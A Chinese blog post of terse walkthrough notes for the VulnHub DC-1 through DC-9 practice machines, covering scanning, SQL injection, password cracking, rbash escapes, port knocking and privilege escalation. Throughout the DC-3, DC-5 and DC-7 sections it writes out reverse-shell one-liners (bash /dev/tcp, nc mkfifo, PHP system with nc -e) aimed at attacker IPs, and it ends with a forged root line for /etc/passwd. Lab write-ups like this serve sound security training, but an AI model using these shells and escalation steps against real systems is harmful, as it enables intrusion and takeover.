vulnhub靶场--DC-1-9

最新推荐文章于 2025-08-06 23:34:35 发布

金灰

最新推荐文章于 2025-08-06 23:34:35 发布

阅读量1.4k

点赞数 48

CC 4.0 BY-SA版权

分类专栏：网络安全 # kali # Web 文章标签：网络安全网络安全

本文链接：https://blog.csdn.net/2303_80857229/article/details/146001596

网络安全同时被 3 个专栏收录

35 篇文章

订阅专栏

Web

31 篇文章

订阅专栏

kali

13 篇文章

订阅专栏

免责声明：本文仅作分享！

凌乱notes.

source:

https://download.vulnhub.com/

DC1:

nmap扫描网段端口服务
msf的漏洞搜索
drupal7的命令执行利用
netcat反向shell
mysql的基本操作
suid提权

端口扫描

80-登录

cms漏洞

漏洞利用

msf:

search Drupal

提示 cms config file

找配置文件

settings.php

$settings[‘file_public_path’] = ‘sites/default/files’;

mysql配置，--》连接--》读用户名密码

mysql

dbuser

R0ck3t

密码爆不出来，

找加密文件，

openssl passwd -l -salt 123 1;

$S$DFvuppgVkQ2mo5PiEQNoEwPoQklZ.b4gYuPi82tGNtb8c2m0MkxH

改密码update

update users set pass='$S$DFvuppgVkQ2mo5PiEQNoEwPoQklZ.b4gYuPi82tGNtb8c2m0MkxH' where name='admin';

update user set pass='xxxx' where name='admin';

登录后台

find提权

/usr/bin/find ./aaa -exec '/bin/sh' \;

find / -exec "/bin/bash" -p \;

find / -exec "/bin/bash" -p \;

DC2:

nmap

扫所有端口

Cewl

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。

目录扫描

dirb

dirsearch

┌──(kali㉿kali)-[~]
└─$ dirb http://dc-2/ 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 30 13:35:44 2024
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)                                                                  
+ http://dc-2/server-status (CODE:403|SIZE:292)                                                            
==> DIRECTORY: http://dc-2/wp-admin/                                                                       
==> DIRECTORY: http://dc-2/wp-content/                                                                     
==> DIRECTORY: http://dc-2/wp-includes/                                                                    
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)                                                                
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)                                                         
==> DIRECTORY: http://dc-2/wp-admin/css/                                                                   
==> DIRECTORY: http://dc-2/wp-admin/images/                                                                
==> DIRECTORY: http://dc-2/wp-admin/includes/                                                              
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)                                                         
==> DIRECTORY: http://dc-2/wp-admin/js/                                                                    
==> DIRECTORY: http://dc-2/wp-admin/maint/                                                                 
==> DIRECTORY: http://dc-2/wp-admin/network/                                                               
==> DIRECTORY: http://dc-2/wp-admin/user/                                                                  
                                                                                                           
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)                                                       
==> DIRECTORY: http://dc-2/wp-content/languages/                                                           
==> DIRECTORY: http://dc-2/wp-content/plugins/                                                             
==> DIRECTORY: http://dc-2/wp-content/themes/                                                              
                                                                                                           
---- Entering directory: http://dc-2/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                 
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)                                                 
                                                                                                           
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                    
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)                                                    
                                                                                                           
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                           
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)                                               
                                                                                                           
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)                                                
                                                                                                           
-----------------
END_TIME: Sat Nov 30 13:35:58 2024
DOWNLOADED: 32284 - FOUND: 12

wpscan

专干wordpress

密码知道了，收集账号--》

wpscan --url http://dc-2/ -e u

admin

tom

jerry

jerry / adipiscing

tom / parturient

登录后台

发现 Jerry可以登录后台

提示我们这里没东西了，所以我们去ssh

ssh

ssh tom@192.168.124.146 -p 7744

--我们发现很多命令都被禁用了，

rbash限制了

compgen -c //查看可以使用的指令

vi

vi随便打开文件

再下面添加

:set shell=/bin/sh

:shell

:set shell=/bin/sh

:shell

执行命令

rbash限制

Vulnhub-DC-2 - 知己呀 - 博客园

把/bin/bash给a变量,绕过首先的shellBASH_CMDS[a]=/bin/sh;a#使用并添加环境变量，将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin

查看

export -p

export -p //查看环境变量

BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a

/bin/bash

export PATH=$PATH:/bin/ //添加环境变量

export PATH=$PATH:/usr/bin //添加环境变量

tom@DC-2:~$ export -p
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -rx PATH="/home/tom/usr/bin"
declare -x PWD="/home/tom"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.19.182 60958 7744"
declare -x SSH_CONNECTION="192.168.19.182 60958 192.168.19.183 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"

git提权

sudo git help config / sudo git -p help

----输入!/bin/bash

DC3:

http://192.168.19.175/

nmap

-- 扫

80---cms指纹

通过CMS的信息，版本，找exp，找到

sql注入

发现存在sql注入，打


http://192.168.19.175/


http://192.168.19.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


sqlmap -u "http://192.168.19.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

---获取后台登录账户，密码

（john爆破密码）

─# john pass1 --show

?:snoopy

1 password hash cracked, 0 left

后台写入---反弹shell/后门

登录后台，写入后门：

得到后门路径：http://192.168.19.175/templates/beez3/shell.php

webshell连接，

提权：

find / -perm -u=s -type f 2>/dev/null

发现没有可利用的，

---》Linux 内核提权，

uname -a

cat /etc/issue

cat /etc/*release #查看发行版信息

cat /proc/version #查看内核版本的全部信息

--->

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_ | linux/local/39772.txt

尝试

内核漏洞提权：

nc xxxxx xxxx -e /bin/bash

<?php

system("bash -c 'bash -i >& /dev/tcp/192.168.100.146/8888 0>&1'");

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.131 1234 >/tmp/f

python -c "import pty;pty.spawn('/bin/bash')"

---执行exp ，你妹的，这里必须反弹shell，webshell马度都不好用。

DC4：

nmap

80--登录框

弱口令

--登录后台

执行命令---反弹shell

查找文件，找到jim用户下的old密码，

复制--用hydra准备爆破，

hydra爆破ssh

---登录ssh

ssh jim@192.168.19.176

密码：jibril04

-- /var/mail jim文件提示charles的密码

切换用户

su charles

teehee 提权

find发现sudo

sudo -l

teehee

DC5:

文件包含

日志写入后门

http://192.168.19.186/thankyou.php?firstname=2&lastname=2&country=canada&subject=2&file=/var/log/nginx/access.log

<?php system("nc -e /bin/bash 192.168.19.182 9090");?>

webshell/反弹shell

screen 提权

4.5.0

www-data:/var/www/html) $ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs



(www-data:/var/www/html) $ exim4 --version
Exim version 4.84_2 #2 built 10-Feb-2018 14:37:59
Copyright (c) University of Cambridge, 1995 - 2014
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2014
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM PRDR OCSP
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated

DC6:

hosts配置

WordPress

[11:10:53] Starting:
[11:10:56] 403 -  291B  - /.ht_wsr.txt
[11:10:56] 403 -  294B  - /.htaccess.bak1
[11:10:56] 403 -  294B  - /.htaccess.orig
[11:10:56] 403 -  296B  - /.htaccess.sample
[11:10:56] 403 -  294B  - /.htaccess.save
[11:10:56] 403 -  295B  - /.htaccess_extra
[11:10:56] 403 -  294B  - /.htaccess_orig
[11:10:56] 403 -  292B  - /.htaccessOLD
[11:10:56] 403 -  292B  - /.htaccess_sc
[11:10:56] 403 -  292B  - /.htaccessBAK
[11:10:56] 403 -  284B  - /.htm
[11:10:56] 403 -  285B  - /.html
[11:10:56] 403 -  294B  - /.htpasswd_test
[11:10:56] 403 -  293B  - /.htaccessOLD2
[11:10:56] 403 -  290B  - /.htpasswds
[11:10:56] 403 -  291B  - /.httr-oauth
[11:10:57] 403 -  284B  - /.php
[11:10:57] 403 -  285B  - /.php3
[11:11:12] 301 -    0B  - /index.php  ->  http://wordy/
[11:11:13] 200 -    7KB - /license.txt
[11:11:19] 200 -    3KB - /readme.html
[11:11:20] 403 -  293B  - /server-status
[11:11:20] 403 -  294B  - /server-status/
[11:11:27] 301 -  301B  - /wp-admin  ->  http://wordy/wp-admin/
[11:11:27] 200 -    0B  - /wp-config.php
[11:11:27] 301 -  303B  - /wp-content  ->  http://wordy/wp-content/
[11:11:27] 403 -  318B  - /wp-content/plugins/akismet/akismet.php
[11:11:27] 403 -  316B  - /wp-content/plugins/akismet/admin.php
[11:11:27] 301 -  304B  - /wp-includes  ->  http://wordy/wp-includes/
[11:11:27] 400 -    1B  - /wp-admin/admin-ajax.php
[11:11:27] 200 -    0B  - /wp-content/
[11:11:27] 200 -    4KB - /wp-includes/
[11:11:27] 200 -    0B  - /wp-cron.php
[11:11:27] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=https%3A%2F%2F2.zoppoz.workers.dev%3A443%2Fhttp%2Fwordy%2Fwp-admin%2F&reauth=1
[11:11:27] 200 -  517B  - /wp-admin/install.php
[11:11:27] 200 -    1KB - /wp-login.php
[11:11:27] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register

WordPress 框架

wpscan 干--》

枚举用户名

wpscan --url http://wordy/ -e u

admin

graham

mark

sarah

jens

爆破密码--登录后台

wpscan --url http://wordy/ -U zh7 -P pass07.txt

mark:helpdesk01

ssh

DC7:

找找找，最后发现，

源码泄露

@DC7USER

GitHub - Dc7User/staffdb

<?php

$servername = "localhost";

$username = "dc7user";

$password = "MdR3xOgB7#dW";

$dbname = "Staff";

$conn = mysqli_connect($servername, $username, $password, $dbname);

尝试登录后台，发现不行

ssh登录

drush改密码

drush user-password admin --password="1"

登录后台

找写php的，

找其支持的插件，php

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.67.144 4444 >/tmp/f" >> backups.sh

DC8:

nmap

-sn

-A

80--sqlmap

可能存在sql注入，

sqlmap直接跑，

john爆破

---得出一个账号的密码

john:turtle

dirsearch扫目录

python dirsearch.py -u "http://192.168.191.179" -i 200-403

访问/user/login ，登录 john账号

写入后门/反弹shell

--找到可以写入的地方，

反弹shell

python -c "import pty;pty.spawn('/bin/bash')"

exim4提权

find / -perm -u=s -type f 2>/dev/null

/usr/bin/chfn

/usr/bin/gpasswd

/usr/bin/chsh

/usr/bin/passwd

/usr/bin/sudo

/usr/bin/newgrp

/usr/sbin/exim4

/usr/lib/openssh/ssh-keysign

/usr/lib/eject/dmcrypt-get-device

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/bin/ping

/bin/su

/bin/umount

/bin/mount

sudo -l

exim4

exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated

searchsploit exim 4.89

---找本地提权的漏洞exp

设置一下编码类型：vi

:set ff=unix

DC9:

搜索框--sql注入

2个数据库，一个Staff，一个users

MD5免费在线解密破解_MD5在线加密-SOMD5

admin:transorbital1

登录后台

文件包含

敲门服务

[原创]安全系列之端口敲门服务（Port Knocking for Ubuntu 14.04 Server） - wsjhk - 博客园
存在knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来"敲门"，使系统开启需要访问的服务端口，才能对外访问。
不使用时，再使用自定义的序列号来"关门"，将端口关闭，不对外监听。进一步提升了服务和系统的安全

//配置文件路径
/etc/knockd.conf
默认配置文件是：/etc/knockd.conf

7469
8475
9842

开门 ssh open

hydra爆破

--整理sql --- 账号，密码
ssh
hydra -l pass1 -P pass2 ssh://xxx

[22][ssh] host: 192.168.19.185 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.19.185 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.19.185 login: janitor password: Ilovepeepee
在janitor 账号下，又发现新的密码，所以添加上，再爆破ssh

提权

sudo -l
一个test文件，通过查找

----2个参数，先读后写。
//etc/passwd下的root用户信息
root:x:0:0:root:/root:/bin/bash

//根据root信息，构造用户信息追加到/etc/passwd文件当中，添加admin用户
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash